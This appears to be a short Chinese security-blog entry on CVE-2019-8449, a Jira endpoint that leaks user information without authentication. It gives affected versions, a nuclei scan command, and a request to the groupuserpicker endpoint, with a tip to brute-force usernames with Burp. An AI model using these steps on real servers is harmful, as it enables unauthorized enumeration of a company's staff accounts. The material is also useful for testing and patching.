Jira 信息泄漏(CVE-2019-8449)

## 漏洞概述

Atlassian Jira 8.4.0之前版本`/rest/api/latest/groupuserpicker`接口允许未授权查询员工信息,攻击者可以通过爆破用户名名单等方法获取用户信息

## 影响范围

“`http
7.12< Jira < 8.4.0 ``` ## POC ```bash nuclei -tags jira -t /cves -l urls.txt ``` ## EXP ```bash /rest/api/latest/groupuserpicker?query=admin #返回的json中没有数据的话admin不存在,有用户相关数据则admin用户存在 #然后直接用Burp爆破用户即可 ```

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容